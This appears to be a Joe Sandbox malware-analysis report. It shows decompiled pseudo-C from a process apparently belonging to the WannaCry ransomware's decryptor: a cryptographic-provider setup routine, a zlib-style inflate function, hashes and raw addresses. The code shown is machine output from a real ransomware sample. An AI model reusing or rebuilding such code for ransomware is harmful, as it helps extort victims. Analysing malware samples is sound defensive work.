                                  			E004046B0(void* __ecx) {
                                  				int _t5;
                                  				HCRYPTPROV* _t8;
                                  				signed int _t9;
                                  
                                  				_t9 = 0;
                                  				_t8 = __ecx + 4;
                                  				while(1) {
                                  					asm("sbb eax, eax");
                                  					_t5 = CryptAcquireContextA(_t8, 0,  ~_t9 & "Microsoft Enhanced RSA and AES Cryptographic Provider", 0x18, 0xf0000000);
                                  					if(_t5 != 0) {
                                  						break;
                                  					}
                                  					_t9 = _t9 + 1;
                                  					if(_t9 < 2) {
                                  						continue;
                                  					} else {
                                  						return _t5;
                                  					}
                                  					L5:
                                  				}
                                  				return 1;
                                  				goto L5;
                                  			}

                                  APIs
                                  • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,0040484E), ref: 004046CD
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AcquireContextCrypt
                                  • String ID:
                                  • API String ID: 3951991833-0
                                  • Opcode ID: bfca8852325fc6aa5ed2ff2f6e8500fcc0a6d4c389fe5d637677a2daa5e65efa
                                  • Instruction ID: 312dc029323720c7b5bb6801e757edcf2da9b650c6ce32f76f805a45e944d122
                                  • Opcode Fuzzy Hash: bfca8852325fc6aa5ed2ff2f6e8500fcc0a6d4c389fe5d637677a2daa5e65efa
                                  • Instruction Fuzzy Hash: 63E0C27B35003029E320042ABC05BE786C8D7E2B61F014436FD05E6184D1598C8780D8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 89%
                                  			E0040DF30() {
                                  				intOrPtr _t308;
                                  				intOrPtr _t310;
                                  				signed int _t356;
                                  				signed int* _t361;
                                  				signed int _t362;
                                  				intOrPtr _t403;
                                  				signed int _t409;
                                  				intOrPtr _t410;
                                  				void* _t411;
                                  				void* _t412;
                                  
                                  				_t410 =  *((intOrPtr*)(_t412 + 0x24));
                                  				_t409 =  *(_t412 + 0x2c);
                                  				_t361 =  *(_t410 + 4);
                                  				_t411 =  *_t409;
                                  				_t356 =  *(_t410 + 0x1c);
                                  				 *(_t412 + 0x2c) =  *(_t409 + 4);
                                  				_t308 =  *((intOrPtr*)(_t410 + 0x30));
                                  				 *(_t412 + 0x28) =  *(_t410 + 0x20);
                                  				_t403 =  *((intOrPtr*)(_t410 + 0x34));
                                  				 *(_t412 + 0x10) = _t361;
                                  				if(_t403 >= _t308) {
                                  					_t310 =  *((intOrPtr*)(_t410 + 0x2c)) - _t403;
                                  				} else {
                                  					_t310 = _t308 - _t403 - 1;
                                  				}
                                  				_t362 =  *_t361;
                                  				 *((intOrPtr*)(_t412 + 0x14)) = _t310;
                                  				if(_t362 > 9) {
                                  					L86:
                                  					 *(_t410 + 0x20) =  *(_t412 + 0x28);
                                  					 *(_t410 + 0x1c) = _t356;
                                  					 *(_t409 + 4) =  *(_t412 + 0x2c);
                                  					_push(0xfffffffe);
                                  					_push(_t409);
                                  					 *((intOrPtr*)(_t409 + 8)) =  *((intOrPtr*)(_t409 + 8)) + _t411 -  *_t409;
                                  					 *_t409 = _t411;
                                  					_push(_t410);
                                  					 *((intOrPtr*)(_t410 + 0x34)) = _t403;
                                  					return E0040DDA0();
                                  				} else {
                                  					do {
                                  						switch( *((intOrPtr*)(_t362 * 4 +  &M0040E6CC))) {
                                  							case 0:
                                  								if(_t310 < 0x102 ||  *(_t412 + 0x2c) < 0xa) {
                                  									L12:
                                  									_t315 =  *(_t412 + 0x10);
                                  									 *_t315 = 1;
                                  									_t315[3] = 0;
                                  									_t315[2] = _t315[5];
                                  									goto L13;
                                  								} else {
                                  									 *(_t410 + 0x20) =  *(_t412 + 0x28);
                                  									 *(_t410 + 0x1c) = _t356;
                                  									 *(_t409 + 4) =  *(_t412 + 0x2c);
                                  									 *_t409 = _t411;
                                  									_t349 =  *(_t412 + 0x10);
                                  									 *((intOrPtr*)(_t409 + 8)) =  *((intOrPtr*)(_t409 + 8)) + _t411 -  *_t409;
                                  									 *((intOrPtr*)(_t410 + 0x34)) = _t403;
                                  									_push(_t409);
                                  									_push(_t410);
                                  									_push(_t349[6]);
                                  									_push(_t349[5]);
                                  									_push(0);
                                  									_push(0);
                                  									_t350 = E0040FBC0();
                                  									_t411 =  *_t409;
                                  									_t356 =  *(_t410 + 0x1c);
                                  									 *(_t412 + 0x44) =  *(_t409 + 4);
                                  									_t397 =  *((intOrPtr*)(_t410 + 0x30));
                                  									 *(_t412 + 0x40) =  *(_t410 + 0x20);
                                  									_t403 =  *((intOrPtr*)(_t410 + 0x34));
                                  									_t412 = _t412 + 0x18;
                                  									 *(_t412 + 0x30) = _t350;
                                  									if(_t403 >= _t397) {
                                  										_t399 =  *((intOrPtr*)(_t410 + 0x2c)) - _t403;
                                  									} else {
                                  										_t399 = _t397 - _t403 - 1;
                                  									}
                                  									 *((intOrPtr*)(_t412 + 0x14)) = _t399;
                                  									if(_t350 == 0) {
                                  										goto L12;
                                  									} else {
                                  										asm("sbb eax, eax");
                                  										 *( *(_t412 + 0x10)) = ( ~(_t350 - 1) & 0x00000002) + 7;
                                  										_t310 =  *((intOrPtr*)(_t412 + 0x14));
                                  										goto L85;
                                  									}
                                  								}
                                  								goto L99;
                                  							case 1:
                                  								L13:
                                  								_t317 = ( *(_t412 + 0x10))[3];
                                  								 *(_t412 + 0x18) = _t317;
                                  								if(_t356 >= _t317) {
                                  									L16:
                                  									_t321 = ( *(_t412 + 0x10))[2] + ( *(0x41a260 + _t317 * 4) &  *(_t412 + 0x28)) * 8;
                                  									 *(_t412 + 0x18) = _t321;
                                  									 *((intOrPtr*)(_t412 + 0x1c)) = 0;
                                  									 *(_t412 + 0x28) =  *(_t412 + 0x28) >>  *(_t321 + 1);
                                  									_t373 =  *(_t412 + 0x18);
                                  									_t356 = _t356;
                                  									_t326 =  *_t373;
                                  									if(0 != 0) {
                                  										if((_t326 & 0x00000010) == 0) {
                                  											if((_t326 & 0x00000040) == 0) {
                                  												goto L34;
                                  											} else {
                                  												_t329 =  *(_t412 + 0x10);
                                  												if((_t326 & 0x00000020) == 0) {
                                  													 *_t329 = 9;
                                  													 *(_t409 + 0x18) = "invalid literal/length code";
                                  													goto L90;
                                  												} else {
                                  													 *_t329 = 7;
                                  													_t310 =  *((intOrPtr*)(_t412 + 0x14));
                                  													goto L85;
                                  												}
                                  											}
                                  										} else {
                                  											_t381 =  *(_t412 + 0x10);
                                  											_t381[2] = 0;
                                  											 *_t381 = 2;
                                  											_t381[1] =  *( *(_t412 + 0x18) + 4);
                                  											_t310 =  *((intOrPtr*)(_t412 + 0x14));
                                  											goto L85;
                                  										}
                                  									} else {
                                  										_t337 =  *(_t412 + 0x10);
                                  										_t337[2] =  *(_t373 + 4);
                                  										 *_t337 = 6;
                                  										_t310 =  *((intOrPtr*)(_t412 + 0x14));
                                  										goto L85;
                                  									}
                                  								} else {
                                  									while(1) {
                                  										_t338 =  *(_t412 + 0x2c);
                                  										if(_t338 == 0) {
                                  											goto L88;
                                  										}
                                  										 *(_t412 + 0x2c) = _t338 - 1;
                                  										_t345 = 0 << _t356;
                                  										_t356 = _t356 + 8;
                                  										 *(_t412 + 0x30) = 0;
                                  										_t317 =  *(_t412 + 0x18);
                                  										_t411 = _t411 + 1;
                                  										 *(_t412 + 0x28) =  *(_t412 + 0x28) | _t345;
                                  										if(_t356 < _t317) {
                                  											continue;
                                  										} else {
                                  											goto L16;
                                  										}
                                  										goto L99;
                                  									}
                                  									goto L88;
                                  								}
                                  								goto L99;
                                  							case 2:
                                  								__ecx =  *(__esp + 0x10);
                                  								__eax =  *( *(__esp + 0x10) + 8);
                                  								 *(__esp + 0x18) = __eax;
                                  								if(__ebx >= __eax) {
                                  									L26:
                                  									__ecx =  *(0x41a260 + __eax * 4);
                                  									__eax =  *(__esp + 0x28);
                                  									__ecx = __ecx &  *(__esp + 0x28);
                                  									__eax =  *(__esp + 0x10);
                                  									 *((intOrPtr*)( *(__esp + 0x10) + 4)) =  *((intOrPtr*)( *(__esp + 0x10) + 4)) + __ecx;
                                  									__ecx =  *(__esp + 0x18);
                                  									 *(__esp + 0x28) =  *(__esp + 0x28) >> __cl;
                                  									 *(__esp + 0x28) =  *(__esp + 0x28) >> __cl;
                                  									__eax =  *(__esp + 0x18);
                                  									__ebx = __ebx -  *(__esp + 0x18);
                                  									__eax =  *(__esp + 0x10);
                                  									__ecx = 0;
                                  									__cl =  *((intOrPtr*)(__eax + 0x11));
                                  									 *__eax = 3;
                                  									 *(__eax + 0xc) = 0;
                                  									__ecx =  *(__eax + 0x18);
                                  									 *(__eax + 8) =  *(__eax + 0x18);
                                  									goto L28;
                                  								} else {
                                  									while(1) {
                                  										__eax =  *(__esp + 0x2c);
                                  										if(__eax == 0) {
                                  											goto L88;
                                  										}
                                  										__eax = __eax - 1;
                                  										__ecx = __ebx;
                                  										 *(__esp + 0x2c) = __eax;
                                  										__eax = 0;
                                  										__al =  *__ebp;
                                  										__ebx = __ebx + 8;
                                  										__eax = 0 << __cl;
                                  										__ecx =  *(__esp + 0x28);
                                  										 *(__esp + 0x30) = 0;
                                  										__ecx =  *(__esp + 0x28) | 0 << __cl;
                                  										__eax =  *(__esp + 0x18);
                                  										__ebp = __ebp + 1;
                                  										 *(__esp + 0x28) =  *(__esp + 0x28) | 0 << __cl;
                                  										if(__ebx < __eax) {
                                  											continue;
                                  										} else {
                                  											goto L26;
                                  										}
                                  										goto L99;
                                  									}
                                  									goto L88;
                                  								}
                                  								goto L99;
                                  							case 3:
                                  								__eax =  *(__esp + 0x10);
                                  								L28:
                                  								__eax =  *(__eax + 0xc);
                                  								 *(__esp + 0x18) = __eax;
                                  								if(__ebx >= __eax) {
                                  									L31:
                                  									__ecx =  *(0x41a260 + __eax * 4);
                                  									__eax =  *(__esp + 0x28);
                                  									__ecx = __ecx &  *(__esp + 0x28);
                                  									 *(__esp + 0x10) =  *( *(__esp + 0x10) + 8);
                                  									__eax =  *( *(__esp + 0x10) + 8) + __ecx * 8;
                                  									__ecx = 0;
                                  									 *(__esp + 0x18) = __eax;
                                  									__cl =  *((intOrPtr*)(__eax + 1));
                                  									 *(__esp + 0x28) =  *(__esp + 0x28) >> __cl;
                                  									 *(__esp + 0x1c) = 0;
                                  									 *(__esp + 0x28) =  *(__esp + 0x28) >> __cl;
                                  									__eax = 0;
                                  									__ecx =  *(__esp + 0x18);
                                  									__ebx = __ebx;
                                  									__eax = 0;
                                  									__al =  *( *(__esp + 0x18));
                                  									if((__al & 0x00000010) == 0) {
                                  										if((__al & 0x00000040) != 0) {
                                  											__eax =  *(__esp + 0x10);
                                  											 *( *(__esp + 0x10)) = 9;
                                  											__edi[6] = "invalid distance code";
                                  											L90:
                                  											 *(_t410 + 0x20) =  *(_t412 + 0x28);
                                  											 *(_t410 + 0x1c) = _t356;
                                  											 *(_t409 + 4) =  *(_t412 + 0x2c);
                                  											_push(0xfffffffd);
                                  											_push(_t409);
                                  											 *((intOrPtr*)(_t409 + 8)) =  *((intOrPtr*)(_t409 + 8)) + _t411 -  *_t409;
                                  											 *_t409 = _t411;
                                  											_push(_t410);
                                  											 *((intOrPtr*)(_t410 + 0x34)) = _t403;
                                  											return E0040DDA0();
                                  										} else {
                                  											L34:
                                  											( *(_t412 + 0x10))[3] = _t326;
                                  											( *(_t412 + 0x10))[2] =  *(_t412 + 0x18) +  *( *(_t412 + 0x18) + 4) * 8;
                                  											_t310 =  *((intOrPtr*)(_t412 + 0x14));
                                  											goto L85;
                                  										}
                                  									} else {
                                  										__ecx =  *(__esp + 0x10);
                                  										__eax = 0;
                                  										 *((intOrPtr*)(__ecx + 8)) = 0;
                                  										 *(__esp + 0x18) =  *( *(__esp + 0x18) + 4);
                                  										 *__ecx = 4;
                                  										 *(__ecx + 0xc) =  *( *(__esp + 0x18) + 4);
                                  										__eax =  *(__esp + 0x14);
                                  										goto L85;
                                  									}
                                  								} else {
                                  									while(1) {
                                  										__eax =  *(__esp + 0x2c);
                                  										if(__eax == 0) {
                                  											goto L88;
                                  										}
                                  										__eax = __eax - 1;
                                  										__ecx = __ebx;
                                  										 *(__esp + 0x2c) = __eax;
                                  										__eax = 0;
                                  										__al =  *__ebp;
                                  										__ebx = __ebx + 8;
                                  										__eax = 0 << __cl;
                                  										__ecx =  *(__esp + 0x28);
                                  										 *(__esp + 0x30) = 0;
                                  										__ecx =  *(__esp + 0x28) | 0 << __cl;
                                  										__eax =  *(__esp + 0x18);
                                  										__ebp = __ebp + 1;
                                  										 *(__esp + 0x28) =  *(__esp + 0x28) | 0 << __cl;
                                  										if(__ebx < __eax) {
                                  											continue;
                                  										} else {
                                  											goto L31;
                                  										}
                                  										goto L99;
                                  									}
                                  									goto L88;
                                  								}
                                  								goto L99;
                                  							case 4:
                                  								__eax =  *(__esp + 0x10);
                                  								__eax =  *( *(__esp + 0x10) + 8);
                                  								 *(__esp + 0x18) = __eax;
                                  								if(__ebx >= __eax) {
                                  									L38:
                                  									__ecx =  *(0x41a260 + __eax * 4);
                                  									__eax =  *(__esp + 0x28);
                                  									__ecx = __ecx &  *(__esp + 0x28);
                                  									__eax =  *(__esp + 0x10);
                                  									 *((intOrPtr*)( *(__esp + 0x10) + 0xc)) =  *((intOrPtr*)( *(__esp + 0x10) + 0xc)) + __ecx;
                                  									__ecx =  *(__esp + 0x18);
                                  									 *(__esp + 0x28) =  *(__esp + 0x28) >> __cl;
                                  									 *(__esp + 0x28) =  *(__esp + 0x28) >> __cl;
                                  									__eax =  *(__esp + 0x18);
                                  									__ebx = __ebx -  *(__esp + 0x18);
                                  									__eax =  *(__esp + 0x10);
                                  									 *( *(__esp + 0x10)) = 5;
                                  									goto L39;
                                  								} else {
                                  									while(1) {
                                  										__eax =  *(__esp + 0x2c);
                                  										if(__eax == 0) {
                                  											break;
                                  										}
                                  										__ecx = 0;
                                  										__eax = __eax - 1;
                                  										__cl =  *__ebp;
                                  										 *(__esp + 0x2c) = __eax;
                                  										__eax = 0;
                                  										__ecx = __ebx;
                                  										__eax = 0 << __cl;
                                  										__ecx =  *(__esp + 0x28);
                                  										__ebx = __ebx + 8;
                                  										 *(__esp + 0x30) = 0;
                                  										__ecx =  *(__esp + 0x28) | 0 << __cl;
                                  										__eax =  *(__esp + 0x18);
                                  										__ebp = __ebp + 1;
                                  										 *(__esp + 0x28) =  *(__esp + 0x28) | 0 << __cl;
                                  										if(__ebx < __eax) {
                                  											continue;
                                  										} else {
                                  											goto L38;
                                  										}
                                  										goto L99;
                                  									}
                                  									L88:
                                  									 *(_t410 + 0x1c) = _t356;
                                  									 *(_t410 + 0x20) =  *(_t412 + 0x28);
                                  									 *(_t409 + 4) = 0;
                                  									 *_t409 = _t411;
                                  									 *((intOrPtr*)(_t409 + 8)) =  *((intOrPtr*)(_t409 + 8)) + _t411 -  *_t409;
                                  									 *((intOrPtr*)(_t410 + 0x34)) = _t403;
                                  									_push( *(_t412 + 0x30));
                                  									_push(_t409);
                                  									_push(_t410);
                                  									return E0040DDA0();
                                  								}
                                  								goto L99;
                                  							case 5:
                                  								L39:
                                  								__ecx =  *(__esp + 0x10);
                                  								__eax = __edx;
                                  								__eax = __edx -  *((intOrPtr*)( *(__esp + 0x10) + 0xc));
                                  								__ecx =  *(__esi + 0x28);
                                  								 *(__esp + 0x1c) = __eax;
                                  								if(__eax < __ecx) {
                                  									__eax =  *(__esi + 0x2c);
                                  									__eax =  *(__esi + 0x2c) - __ecx;
                                  									__ecx =  *(__esp + 0x1c);
                                  									 *(__esp + 0x20) = __eax;
                                  									while(1) {
                                  										__ecx = __ecx + __eax;
                                  										__eax =  *(__esi + 0x28);
                                  										if(__ecx >=  *(__esi + 0x28)) {
                                  											break;
                                  										}
                                  										__eax =  *(__esp + 0x20);
                                  									}
                                  									 *(__esp + 0x1c) = __ecx;
                                  								}
                                  								__ecx =  *(__esp + 0x10);
                                  								__eax =  *(__ecx + 4);
                                  								__eax =  *(__esp + 0x14);
                                  								if( *(__ecx + 4) != 0) {
                                  									do {
                                  										if(__eax != 0) {
                                  											goto L62;
                                  										} else {
                                  											__eax =  *(__esi + 0x2c);
                                  											 *(__esp + 0x18) = __eax;
                                  											if(__edx != __eax) {
                                  												L52:
                                  												 *(__esi + 0x34) = __edx;
                                  												__edx =  *(__esp + 0x30);
                                  												_push( *(__esp + 0x30));
                                  												_push(__edi);
                                  												_push(__esi);
                                  												__eax = E0040DDA0();
                                  												__edx =  *(__esi + 0x34);
                                  												 *(__esp + 0x3c) = __eax;
                                  												__eax =  *(__esi + 0x30);
                                  												__esp = __esp + 0xc;
                                  												 *(__esp + 0x20) = __eax;
                                  												if(__edx >= __eax) {
                                  													__eax =  *(__esi + 0x2c);
                                  													__eax =  *(__esi + 0x2c) - __edx;
                                  												} else {
                                  													__eax = __eax - __edx;
                                  													__eax = __eax - 1;
                                  												}
                                  												__ecx =  *(__esi + 0x2c);
                                  												 *(__esp + 0x14) = __eax;
                                  												 *(__esp + 0x18) = __ecx;
                                  												if(__edx == __ecx) {
                                  													__ecx =  *(__esi + 0x28);
                                  													__eax =  *(__esp + 0x20);
                                  													if(__eax == __ecx) {
                                  														__eax =  *(__esp + 0x14);
                                  													} else {
                                  														__edx = __ecx;
                                  														if(__edx >= __eax) {
                                  															__eax =  *(__esp + 0x18);
                                  															__eax =  *(__esp + 0x18) - __edx;
                                  														} else {
                                  															__eax = __eax - __edx;
                                  															__eax = __eax - 1;
                                  														}
                                  													}
                                  												}
                                  												if(__eax == 0) {
                                  													goto L91;
                                  												} else {
                                  													goto L62;
                                  												}
                                  											} else {
                                  												__eax =  *(__esi + 0x30);
                                  												__ecx =  *(__esi + 0x28);
                                  												if(__eax == __ecx) {
                                  													goto L52;
                                  												} else {
                                  													__edx = __ecx;
                                  													if(__edx >= __eax) {
                                  														__eax =  *(__esp + 0x18);
                                  														__eax =  *(__esp + 0x18) - __edx;
                                  													} else {
                                  														__eax = __eax - __edx;
                                  														__eax = __eax - 1;
                                  													}
                                  													if(__eax != 0) {
                                  														goto L62;
                                  													} else {
                                  														goto L52;
                                  													}
                                  												}
                                  											}
                                  										}
                                  										goto L99;
                                  										L62:
                                  										__ecx =  *(__esp + 0x1c);
                                  										__edx = __edx + 1;
                                  										 *(__esp + 0x30) = 0;
                                  										__cl =  *( *(__esp + 0x1c));
                                  										 *(__edx - 1) = __cl;
                                  										__ecx =  *(__esp + 0x1c);
                                  										__ecx =  *(__esp + 0x1c) + 1;
                                  										__eax = __eax - 1;
                                  										 *(__esp + 0x1c) = __ecx;
                                  										 *(__esp + 0x14) = __eax;
                                  										if(__ecx ==  *(__esi + 0x2c)) {
                                  											__ecx =  *(__esi + 0x28);
                                  											 *(__esp + 0x1c) =  *(__esi + 0x28);
                                  										}
                                  										__ecx =  *(__esp + 0x10);
                                  										_t212 = __ecx + 4;
                                  										 *_t212 =  *(__ecx + 4) - 1;
                                  									} while ( *_t212 != 0);
                                  								}
                                  								goto L84;
                                  							case 6:
                                  								if(__eax != 0) {
                                  									L83:
                                  									__ecx =  *(__esp + 0x10);
                                  									__edx = __edx + 1;
                                  									__eax = __eax - 1;
                                  									 *(__esp + 0x30) = 0;
                                  									__cl =  *( *(__esp + 0x10) + 8);
                                  									 *(__esp + 0x14) = __eax;
                                  									 *(__edx - 1) = __cl;
                                  									__ecx =  *(__esp + 0x10);
                                  									L84:
                                  									 *__ecx = 0;
                                  									goto L85;
                                  								} else {
                                  									__eax =  *(__esi + 0x2c);
                                  									 *(__esp + 0x18) = __eax;
                                  									if(__edx != __eax) {
                                  										L73:
                                  										 *(__esi + 0x34) = __edx;
                                  										__edx =  *(__esp + 0x30);
                                  										_push( *(__esp + 0x30));
                                  										_push(__edi);
                                  										_push(__esi);
                                  										__eax = E0040DDA0();
                                  										__edx =  *(__esi + 0x34);
                                  										 *(__esp + 0x3c) = __eax;
                                  										__eax =  *(__esi + 0x30);
                                  										__esp = __esp + 0xc;
                                  										 *(__esp + 0x20) = __eax;
                                  										if(__edx >= __eax) {
                                  											__eax =  *(__esi + 0x2c);
                                  											__eax =  *(__esi + 0x2c) - __edx;
                                  										} else {
                                  											__eax = __eax - __edx;
                                  											__eax = __eax - 1;
                                  										}
                                  										__ecx =  *(__esi + 0x2c);
                                  										 *(__esp + 0x14) = __eax;
                                  										 *(__esp + 0x18) = __ecx;
                                  										if(__edx == __ecx) {
                                  											__ecx =  *(__esi + 0x28);
                                  											__eax =  *(__esp + 0x20);
                                  											if(__eax == __ecx) {
                                  												__eax =  *(__esp + 0x14);
                                  											} else {
                                  												__edx = __ecx;
                                  												if(__edx >= __eax) {
                                  													__eax =  *(__esp + 0x18);
                                  													__eax =  *(__esp + 0x18) - __edx;
                                  												} else {
                                  													__eax = __eax - __edx;
                                  													__eax = __eax - 1;
                                  												}
                                  											}
                                  										}
                                  										if(__eax == 0) {
                                  											L91:
                                  											__eax =  *(__esp + 0x28);
                                  											__ecx =  *(__esp + 0x2c);
                                  											 *(__esi + 0x20) =  *(__esp + 0x28);
                                  											 *(__esi + 0x1c) = __ebx;
                                  											__ebx =  *__edi;
                                  											__eax = __ebp;
                                  											__edi[1] =  *(__esp + 0x2c);
                                  											__ecx = __edi[2];
                                  											__eax = __ebp -  *__edi;
                                  											 *__edi = __ebp;
                                  											__ecx = __edi[2] + __ebp -  *__edi;
                                  											__edi[2] = __edi[2] + __ebp -  *__edi;
                                  											__ecx =  *(__esp + 0x30);
                                  											_push( *(__esp + 0x30));
                                  											_push(__edi);
                                  											_push(__esi);
                                  											 *(__esi + 0x34) = __edx;
                                  											__eax = E0040DDA0();
                                  											__esp = __esp + 0xc;
                                  											return __eax;
                                  										} else {
                                  											goto L83;
                                  										}
                                  									} else {
                                  										__eax =  *(__esi + 0x30);
                                  										__ecx =  *(__esi + 0x28);
                                  										if(__eax == __ecx) {
                                  											goto L73;
                                  										} else {
                                  											__edx = __ecx;
                                  											if(__edx >= __eax) {
                                  												__eax =  *(__esp + 0x18);
                                  												__eax =  *(__esp + 0x18) - __edx;
                                  											} else {
                                  												__eax = __eax - __edx;
                                  												__eax = __eax - 1;
                                  											}
                                  											if(__eax != 0) {
                                  												goto L83;
                                  											} else {
                                  												goto L73;
                                  											}
                                  										}
                                  									}
                                  								}
                                  								goto L99;
                                  							case 7:
                                  								if(__ebx > 7) {
                                  									__ecx =  *(__esp + 0x2c);
                                  									__ebx = __ebx - 8;
                                  									__ecx =  *(__esp + 0x2c) + 1;
                                  									__ebp = __ebp - 1;
                                  									 *(__esp + 0x2c) =  *(__esp + 0x2c) + 1;
                                  								}
                                  								 *(__esi + 0x34) = __edx;
                                  								__edx =  *(__esp + 0x30);
                                  								_push( *(__esp + 0x30));
                                  								_push(__edi);
                                  								_push(__esi);
                                  								__eax = E0040DDA0();
                                  								__edx =  *(__esi + 0x34);
                                  								__ecx =  *(__esi + 0x30);
                                  								__esp = __esp + 0xc;
                                  								if( *(__esi + 0x30) == __edx) {
                                  									__eax =  *(__esp + 0x10);
                                  									 *( *(__esp + 0x10)) = 8;
                                  									goto L97;
                                  								} else {
                                  									__ecx =  *(__esp + 0x28);
                                  									 *(__esi + 0x1c) = __ebx;
                                  									 *(__esi + 0x20) =  *(__esp + 0x28);
                                  									__ecx =  *(__esp + 0x2c);
                                  									__ebx =  *__edi;
                                  									__edi[1] =  *(__esp + 0x2c);
                                  									__ecx = __ebp;
                                  									_push(__eax);
                                  									__ecx = __ebp -  *__edi;
                                  									__edi[2] = __edi[2] + __ebp -  *__edi;
                                  									_push(__edi);
                                  									__edi[2] = __edi[2] + __ebp -  *__edi;
                                  									 *__edi = __ebp;
                                  									_push(__esi);
                                  									 *(__esi + 0x34) = __edx;
                                  									__eax = E0040DDA0();
                                  									__esp = __esp + 0xc;
                                  									return __eax;
                                  								}
                                  								goto L99;
                                  							case 8:
                                  								L97:
                                  								__ecx =  *(__esp + 0x28);
                                  								__eax =  *(__esp + 0x2c);
                                  								 *(__esi + 0x20) =  *(__esp + 0x28);
                                  								 *(__esi + 0x1c) = __ebx;
                                  								__ebx =  *__edi;
                                  								__ecx = __ebp;
                                  								__edi[1] =  *(__esp + 0x2c);
                                  								__eax = __edi[2];
                                  								__ecx = __ebp -  *__edi;
                                  								_push(1);
                                  								__eax = __edi[2] + __ebp -  *__edi;
                                  								_push(__edi);
                                  								__edi[2] = __edi[2] + __ebp -  *__edi;
                                  								 *__edi = __ebp;
                                  								_push(__esi);
                                  								 *(__esi + 0x34) = __edx;
                                  								__eax = E0040DDA0();
                                  								__esp = __esp + 0xc;
                                  								return __eax;
                                  								goto L99;
                                  							case 9:
                                  								__eax =  *(__esp + 0x28);
                                  								__ecx =  *(__esp + 0x2c);
                                  								 *(__esi + 0x20) =  *(__esp + 0x28);
                                  								 *(__esi + 0x1c) = __ebx;
                                  								__ebx =  *__edi;
                                  								__eax = __ebp;
                                  								__edi[1] =  *(__esp + 0x2c);
                                  								__ecx = __edi[2];
                                  								__eax = __ebp -  *__edi;
                                  								_push(0xfffffffd);
                                  								__ecx = __edi[2] + __ebp -  *__edi;
                                  								_push(__edi);
                                  								__edi[2] = __edi[2] + __ebp -  *__edi;
                                  								 *__edi = __ebp;
                                  								_push(__esi);
                                  								 *(__esi + 0x34) = __edx;
                                  								__eax = E0040DDA0();
                                  								__esp = __esp + 0xc;
                                  								return __eax;
                                  								goto L99;
                                  						}
                                  						L85:
                                  						_t362 =  *( *(_t412 + 0x10));
                                  					} while (_t362 <= 9);
                                  					goto L86;
                                  				}
                                  				L99:
                                  			}













                                  0x0040e065
                                  0x0040e06d
                                  0x0040e073
                                  0x0040e076
                                  0x0040e080
                                  0x0040e084
                                  0x0040e087
                                  0x0040e08b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040e08b
                                  0x00000000
                                  0x0040e053
                                  0x00000000
                                  0x00000000
                                  0x0040e12e
                                  0x0040e132
                                  0x0040e137
                                  0x0040e13b
                                  0x0040e175
                                  0x0040e175
                                  0x0040e17c
                                  0x0040e180
                                  0x0040e182
                                  0x0040e186
                                  0x0040e189
                                  0x0040e191
                                  0x0040e193
                                  0x0040e197
                                  0x0040e199
                                  0x0040e19b
                                  0x0040e19f
                                  0x0040e1a1
                                  0x0040e1a4
                                  0x0040e1aa
                                  0x0040e1ad
                                  0x0040e1b0
                                  0x00000000
                                  0x0040e13d
                                  0x0040e13d
                                  0x0040e13d
                                  0x0040e143
                                  0x00000000
                                  0x00000000
                                  0x0040e149
                                  0x0040e14a
                                  0x0040e14c
                                  0x0040e150
                                  0x0040e152
                                  0x0040e155
                                  0x0040e158
                                  0x0040e15a
                                  0x0040e15e
                                  0x0040e166
                                  0x0040e168
                                  0x0040e16c
                                  0x0040e16f
                                  0x0040e173
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040e173
                                  0x00000000
                                  0x0040e13d
                                  0x00000000
                                  0x00000000
                                  0x0040e1b5
                                  0x0040e1b9
                                  0x0040e1b9
                                  0x0040e1be
                                  0x0040e1c2
                                  0x0040e1fc
                                  0x0040e1fc
                                  0x0040e203
                                  0x0040e207
                                  0x0040e20d
                                  0x0040e210
                                  0x0040e213
                                  0x0040e215
                                  0x0040e219
                                  0x0040e220
                                  0x0040e222
                                  0x0040e226
                                  0x0040e22a
                                  0x0040e22c
                                  0x0040e230
                                  0x0040e232
                                  0x0040e234
                                  0x0040e238
                                  0x0040e25f
                                  0x0040e569
                                  0x0040e56d
                                  0x0040e573
                                  0x0040e57a
                                  0x0040e582
                                  0x0040e585
                                  0x0040e58c
                                  0x0040e594
                                  0x0040e598
                                  0x0040e599
                                  0x0040e59c
                                  0x0040e59e
                                  0x0040e59f
                                  0x0040e5b1
                                  0x0040e265
                                  0x0040e265
                                  0x0040e269
                                  0x0040e27a
                                  0x0040e27d
                                  0x00000000
                                  0x0040e27d
                                  0x0040e23a
                                  0x0040e23a
                                  0x0040e23e
                                  0x0040e241
                                  0x0040e248
                                  0x0040e24b
                                  0x0040e251
                                  0x0040e254
                                  0x00000000
                                  0x0040e254
                                  0x0040e1c4
                                  0x0040e1c4
                                  0x0040e1c4
                                  0x0040e1ca
                                  0x00000000
                                  0x00000000
                                  0x0040e1d0
                                  0x0040e1d1
                                  0x0040e1d3
                                  0x0040e1d7
                                  0x0040e1d9
                                  0x0040e1dc
                                  0x0040e1df
                                  0x0040e1e1
                                  0x0040e1e5
                                  0x0040e1ed
                                  0x0040e1ef
                                  0x0040e1f3
                                  0x0040e1f6
                                  0x0040e1fa
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040e1fa
                                  0x00000000
                                  0x0040e1c4
                                  0x00000000
                                  0x00000000
                                  0x0040e286
                                  0x0040e28a
                                  0x0040e28f
                                  0x0040e293
                                  0x0040e2cf
                                  0x0040e2cf
                                  0x0040e2d6
                                  0x0040e2da
                                  0x0040e2dc
                                  0x0040e2e0
                                  0x0040e2e3
                                  0x0040e2eb
                                  0x0040e2ed
                                  0x0040e2f1
